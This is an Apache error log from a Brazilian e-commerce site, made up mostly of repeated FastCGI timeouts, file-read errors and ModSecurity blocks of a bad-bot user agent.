[Mon Mar 16 23:23:26.134509 2026] [proxy_fcgi:error] [pid 4740:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:48398] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:23:32.513683 2026] [mime_magic:error] [pid 2473:tid 140411691570944] (70014)End of file found: [client 66.249.74.169:51131] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Mon Mar 16 23:23:48.125806 2026] [proxy_fcgi:error] [pid 2325:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:48670] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:24:07.655358 2026] [mime_magic:error] [pid 2473:tid 140411616036608] (70014)End of file found: [client 66.249.74.161:51544] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Mon Mar 16 23:24:09.126395 2026] [proxy_fcgi:error] [pid 4740:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:48890] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:24:32.117809 2026] [proxy_fcgi:error] [pid 2473:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:49110] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:24:54.069884 2026] [proxy_fcgi:error] [pid 11293:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:49402] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:25:16.121819 2026] [proxy_fcgi:error] [pid 2304:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:49636] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:25:38.130425 2026] [proxy_fcgi:error] [pid 4740:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:49726] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:26:00.048902 2026] [proxy_fcgi:error] [pid 4740:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:49918] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:26:22.121823 2026] [proxy_fcgi:error] [pid 11469:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:50212] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:26:44.129947 2026] [proxy_fcgi:error] [pid 2304:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:50450] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:27:00.230823 2026] [:error] [pid 2473:tid 140411557287680] [client 74.7.244.31:38568] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abi79KBJNF7axNlVR0XEtwAAABY"]
[Mon Mar 16 23:27:05.325682 2026] [proxy_fcgi:error] [pid 4740:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:50646] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:27:27.141772 2026] [proxy_fcgi:error] [pid 11293:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:50854] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:27:50.037810 2026] [proxy_fcgi:error] [pid 11293:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:51072] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:28:13.123056 2026] [proxy_fcgi:error] [pid 2473:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:51358] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:28:34.129811 2026] [proxy_fcgi:error] [pid 2304:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:51528] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:28:55.133811 2026] [proxy_fcgi:error] [pid 11469:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:51706] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:29:16.121827 2026] [proxy_fcgi:error] [pid 2305:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:51796] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:29:37.133799 2026] [proxy_fcgi:error] [pid 2305:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:52132] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:29:58.108776 2026] [proxy_fcgi:error] [pid 2304:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:52554] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:30:20.132444 2026] [proxy_fcgi:error] [pid 2473:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:52886] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:30:42.129885 2026] [proxy_fcgi:error] [pid 11469:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:53060] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:31:08.134743 2026] [proxy_fcgi:error] [pid 2304:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:53250] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:31:30.037842 2026] [proxy_fcgi:error] [pid 11469:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:53392] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:31:51.129963 2026] [proxy_fcgi:error] [pid 2304:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:53528] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:31:59.404168 2026] [mime_magic:error] [pid 11469:tid 140411741927168] (70014)End of file found: [client 66.249.74.169:38391] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Mon Mar 16 23:32:12.073856 2026] [proxy_fcgi:error] [pid 11293:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:53740] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:32:34.123249 2026] [proxy_fcgi:error] [pid 11469:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:53990] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:32:55.073832 2026] [proxy_fcgi:error] [pid 11469:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:54152] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:33:16.121785 2026] [proxy_fcgi:error] [pid 2325:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:54246] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:33:39.124497 2026] [proxy_fcgi:error] [pid 4740:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:54420] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:34:01.129791 2026] [proxy_fcgi:error] [pid 4740:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:54680] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:34:23.131316 2026] [proxy_fcgi:error] [pid 2305:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:54824] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:34:44.129779 2026] [proxy_fcgi:error] [pid 11293:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:54976] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:35:05.121833 2026] [proxy_fcgi:error] [pid 2325:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:55174] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:35:26.120054 2026] [proxy_fcgi:error] [pid 2473:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:55366] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:35:47.137794 2026] [proxy_fcgi:error] [pid 2325:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:55568] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:36:08.125894 2026] [proxy_fcgi:error] [pid 2305:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:55734] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:36:11.463207 2026] [:error] [pid 11469:tid 140411590858496] [client 74.7.228.16:42062] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abi-G5DEJR9VXonE_-0Q9QAAARI"]
[Mon Mar 16 23:36:31.121793 2026] [proxy_fcgi:error] [pid 2304:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:55912] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:36:54.122892 2026] [proxy_fcgi:error] [pid 2304:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:56144] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:37:15.106832 2026] [proxy_fcgi:error] [pid 2304:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:56316] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:37:37.069833 2026] [proxy_fcgi:error] [pid 2325:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:56518] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:37:37.252309 2026] [:error] [pid 11469:tid 140411574073088] [client 74.7.244.31:55732] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abi-cZDEJR9VXonE_-0RBgAAARQ"]
[Mon Mar 16 23:37:59.125876 2026] [proxy_fcgi:error] [pid 11469:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:56724] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:38:21.134256 2026] [proxy_fcgi:error] [pid 2305:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:56874] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:38:43.122128 2026] [proxy_fcgi:error] [pid 11469:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:57076] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:38:54.753346 2026] [mime_magic:error] [pid 4740:tid 140411674785536] (70014)End of file found: [client 66.249.74.160:60671] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/shop/pg/81establishment/30035
[Mon Mar 16 23:39:04.069839 2026] [proxy_fcgi:error] [pid 11469:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:57290] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:39:26.133784 2026] [proxy_fcgi:error] [pid 11293:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:57444] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:39:48.122602 2026] [proxy_fcgi:error] [pid 2304:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:57692] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:40:10.105911 2026] [proxy_fcgi:error] [pid 2305:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:57958] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:40:32.057814 2026] [proxy_fcgi:error] [pid 11293:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:58098] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:40:53.139169 2026] [proxy_fcgi:error] [pid 2305:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:58258] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:41:15.125844 2026] [proxy_fcgi:error] [pid 4740:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:58422] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:41:32.014939 2026] [:error] [pid 2304:tid 140411666392832] [client 74.7.228.16:59378] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abi_XMh3JZxwdBQwPYG8eQAAAIk"]
[Mon Mar 16 23:41:36.131722 2026] [proxy_fcgi:error] [pid 2305:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:58550] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:41:58.121965 2026] [proxy_fcgi:error] [pid 2325:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:58748] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:42:21.113626 2026] [proxy_fcgi:error] [pid 11293:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:58942] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:42:43.155422 2026] [proxy_fcgi:error] [pid 2473:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:59134] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:43:00.103123 2026] [:error] [pid 2473:tid 140411699963648] [client 74.7.244.31:54206] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abi_tKBJNF7axNlVR0XFqwAAAAU"]
[Mon Mar 16 23:43:04.102018 2026] [proxy_fcgi:error] [pid 4740:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:59334] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:43:26.065894 2026] [proxy_fcgi:error] [pid 2473:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:59542] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:43:47.135027 2026] [proxy_fcgi:error] [pid 2473:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:59756] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:44:08.127934 2026] [proxy_fcgi:error] [pid 2325:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:59950] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:44:30.053886 2026] [proxy_fcgi:error] [pid 2325:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:60094] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:44:30.388871 2026] [proxy_fcgi:error] [pid 2304:tid 140411565680384] [client 103.214.142.103:55091] AH01071: Got error 'Primary script unknown', referer: https://bandeirantesbombas.com.br/admin.php
[Mon Mar 16 23:44:51.121816 2026] [proxy_fcgi:error] [pid 2473:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:60310] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:45:13.125824 2026] [proxy_fcgi:error] [pid 2304:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:60530] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:45:34.125544 2026] [proxy_fcgi:error] [pid 11293:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:60684] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:45:56.129793 2026] [proxy_fcgi:error] [pid 2473:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:60900] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:46:17.131120 2026] [proxy_fcgi:error] [pid 11293:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:32798] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:46:38.128644 2026] [proxy_fcgi:error] [pid 11469:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:32972] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:46:42.487512 2026] [:error] [pid 2473:tid 140411649607424] [client 74.7.228.16:33796] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abjAkqBJNF7axNlVR0XF9QAAAAs"]
[Mon Mar 16 23:47:01.045840 2026] [proxy_fcgi:error] [pid 11469:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:33162] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:47:22.145779 2026] [proxy_fcgi:error] [pid 2473:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:33356] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:47:43.115280 2026] [proxy_fcgi:error] [pid 4740:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:33590] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:48:03.561235 2026] [:error] [pid 4740:tid 140411590858496] [client 74.7.244.31:38508] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abjA4wfYLcKp6Sb5AeL_eAAAAFI"]
[Mon Mar 16 23:48:05.109443 2026] [proxy_fcgi:error] [pid 11293:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:33834] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:48:26.045876 2026] [proxy_fcgi:error] [pid 2325:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:34020] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:48:47.133810 2026] [proxy_fcgi:error] [pid 11293:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:34208] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:49:08.045975 2026] [proxy_fcgi:error] [pid 2304:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:34382] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:49:30.125822 2026] [proxy_fcgi:error] [pid 2304:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:34608] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:49:52.125802 2026] [proxy_fcgi:error] [pid 11469:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:34828] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:50:14.129820 2026] [proxy_fcgi:error] [pid 11469:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:34996] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:50:35.057876 2026] [proxy_fcgi:error] [pid 4740:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:35186] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:50:56.121009 2026] [proxy_fcgi:error] [pid 11469:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:35390] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:51:17.929808 2026] [proxy_fcgi:error] [pid 2304:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:35558] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:51:40.611099 2026] [proxy_fcgi:error] [pid 11469:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:35752] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:52:02.133864 2026] [proxy_fcgi:error] [pid 2304:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:35864] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:52:14.440412 2026] [:error] [pid 11293:tid 140411607643904] [client 74.7.228.16:36766] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abjB3tCmCSWTlPouqoqSbAAAANA"]
[Mon Mar 16 23:52:23.129819 2026] [proxy_fcgi:error] [pid 4740:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:35988] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:52:44.129825 2026] [proxy_fcgi:error] [pid 11469:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:36230] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:53:06.126655 2026] [proxy_fcgi:error] [pid 11469:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:36400] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:53:23.173038 2026] [:error] [pid 2325:tid 140411565680384] [client 74.7.244.31:35008] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abjCI-82sZHvlq4xgHqLrgAAApU"]
[Mon Mar 16 23:53:27.033938 2026] [proxy_fcgi:error] [pid 11293:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:36534] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:53:33.853916 2026] [access_compat:error] [pid 2325:tid 140411616036608] [client 38.127.61.169:28674] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/style.php
[Mon Mar 16 23:53:48.046120 2026] [proxy_fcgi:error] [pid 2325:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:36674] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:54:09.129828 2026] [proxy_fcgi:error] [pid 11469:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:36834] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:54:31.121765 2026] [proxy_fcgi:error] [pid 2473:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:36982] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:54:52.129858 2026] [proxy_fcgi:error] [pid 11293:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:37152] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:55:13.139449 2026] [proxy_fcgi:error] [pid 2325:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:37308] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:55:35.125806 2026] [proxy_fcgi:error] [pid 11293:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:37476] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:55:56.137916 2026] [proxy_fcgi:error] [pid 2305:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:37648] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:56:17.129797 2026] [proxy_fcgi:error] [pid 4740:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:37920] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:56:38.126975 2026] [proxy_fcgi:error] [pid 2305:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:38084] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:57:00.129904 2026] [proxy_fcgi:error] [pid 11293:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:38186] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:57:16.629549 2026] [:error] [pid 2473:tid 140411590858496] [client 74.7.228.16:54886] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abjDDKBJNF7axNlVR0XGyAAAABI"]
[Mon Mar 16 23:57:21.049834 2026] [proxy_fcgi:error] [pid 11293:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:38306] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:57:45.125786 2026] [proxy_fcgi:error] [pid 4740:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:38484] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:58:06.069856 2026] [proxy_fcgi:error] [pid 2473:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:38714] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:58:29.133846 2026] [proxy_fcgi:error] [pid 2473:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:38968] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:58:50.118883 2026] [proxy_fcgi:error] [pid 2325:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:39134] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:59:11.042124 2026] [proxy_fcgi:error] [pid 2304:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:39280] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:59:32.126656 2026] [proxy_fcgi:error] [pid 4740:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:39416] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 23:59:53.129789 2026] [proxy_fcgi:error] [pid 2304:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:39570] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:00:14.127252 2026] [proxy_fcgi:error] [pid 2325:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:39674] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:00:36.333788 2026] [proxy_fcgi:error] [pid 2325:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:39832] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:00:58.135363 2026] [proxy_fcgi:error] [pid 2305:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:39990] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:01:19.099003 2026] [proxy_fcgi:error] [pid 2473:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:40102] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:01:40.109817 2026] [proxy_fcgi:error] [pid 2305:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:40240] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:02:01.082063 2026] [proxy_fcgi:error] [pid 2305:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:40326] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:02:22.557832 2026] [proxy_fcgi:error] [pid 2305:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:40470] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:02:37.284397 2026] [:error] [pid 11469:tid 140411565680384] [client 74.7.228.16:41312] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abjETZDEJR9VXonE_-0TVAAAARU"]
[Tue Mar 17 00:02:44.122021 2026] [proxy_fcgi:error] [pid 2304:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:40664] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:03:06.129839 2026] [proxy_fcgi:error] [pid 2304:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:40810] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:03:27.057806 2026] [proxy_fcgi:error] [pid 11469:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:40984] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:03:51.033805 2026] [proxy_fcgi:error] [pid 2325:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:41136] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:04:12.126185 2026] [proxy_fcgi:error] [pid 11469:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:41250] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:04:33.115828 2026] [proxy_fcgi:error] [pid 2304:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:41432] AH01075: Error dispatching request to : (polling)
